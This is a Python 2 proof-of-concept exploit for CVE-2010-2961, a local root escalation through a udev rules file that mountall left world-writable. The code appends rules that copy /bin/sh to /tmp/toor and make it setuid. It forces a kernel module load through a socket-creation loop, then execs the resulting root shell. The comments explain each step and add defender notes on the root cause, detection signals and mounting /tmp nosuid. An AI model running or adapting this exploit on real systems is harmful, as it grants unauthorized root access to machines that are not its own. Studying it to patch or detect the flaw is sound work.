#!/usr/bin/env python
# Copyright 2010 Canonical, Ltd
# License: GPLv3
# Author: Kees Cook <kees@ubuntu.com>
#
# CVE-2010-2961
#
# Exploits a udev rule file left world-writable by mountall, triggering udev
# to run arbitrary commands.
import sys, os, subprocess, socket, tempfile, time

# Step 1: append two rules to a udev rules file.
# Per the header of this file, mountall left this rules file world-writable
# (CVE-2010-2961); that is why an unprivileged open(..., "a") can succeed.
# Both rules match events with SUBSYSTEM=="module" and add a RUN+= command.
# udev runs RUN commands itself, so they execute with the udev daemon's
# privileges (normally root) rather than those of this script's user:
#   1. copy /bin/sh to /tmp/toor
#   2. set the setuid and setgid bits (ug+s) on that copy
# NOTE(review): the file object is never closed explicitly; the write reaches
# disk when the temporary object is released (relies on interpreter
# refcounting, confirm if this ever matters).
# Defender notes: the root cause is the mode of root.rules, so the fix is for
# the file's creator to never leave it writable by non-root users. Useful
# signals are rule files under /dev/.udev/rules.d/ that are world-writable or
# modified by a non-root user, and set-id copies of a shell appearing in /tmp.
# Mounting /tmp with nosuid makes the set-id bits from the second rule
# ineffective.
open("/dev/.udev/rules.d/root.rules","a").write('''
SUBSYSTEM=="module", RUN+="/bin/cp /bin/sh /tmp/toor"
SUBSYSTEM=="module", RUN+="/bin/chmod ug+s /tmp/toor"
''')

# Step 2: provoke a "module" subsystem event so the appended rules fire.
# The loop requests a stream socket for each address-family number 0..39.
# Presumably the intent is that asking for a family whose protocol module is
# not yet loaded makes the kernel auto-load that module.
# Success is detected indirectly: /proc/modules is re-read after every attempt
# and compared with the snapshot taken before the loop.
# The rules above match every SUBSYSTEM=="module" event, so the remedy belongs
# with the rules file's permissions, not with this particular trigger.
loaded = False
before = open("/proc/modules","r").read()
for af in range(40):
    try:
        s = socket.socket(af, socket.SOCK_STREAM, 0)
    except:
        # socket() raises for families it cannot create. The bare except
        # swallows every exception here, KeyboardInterrupt included.
        pass
    if before != open("/proc/modules","r").read():
        loaded = True
        break

# Exit status 1: the module list never changed, so no module event is expected.
# (The print statements in this script are Python 2 syntax.)
if not loaded:
    print "Failed to trigger a module load through sockets, try something else"
    sys.exit(1)

# Step 3: poll for the artefact of the first rule.
# Up to 50 checks are made, 0.1 s apart (about 5 s in total). As soon as
# /tmp/toor exists, os.execv replaces this process with it (argv[0] is 'sh');
# execv does not return on success.
for i in range(50):
    if os.path.exists("/tmp/toor"):
        os.execv("/tmp/toor",['sh'])
    time.sleep(0.1)

# Exit status 2: a module load was observed but /tmp/toor never appeared,
# i.e. the appended rules were not applied within the polling window.
print "Hmpf, udev didn't notice the new rule"
sys.exit(2)
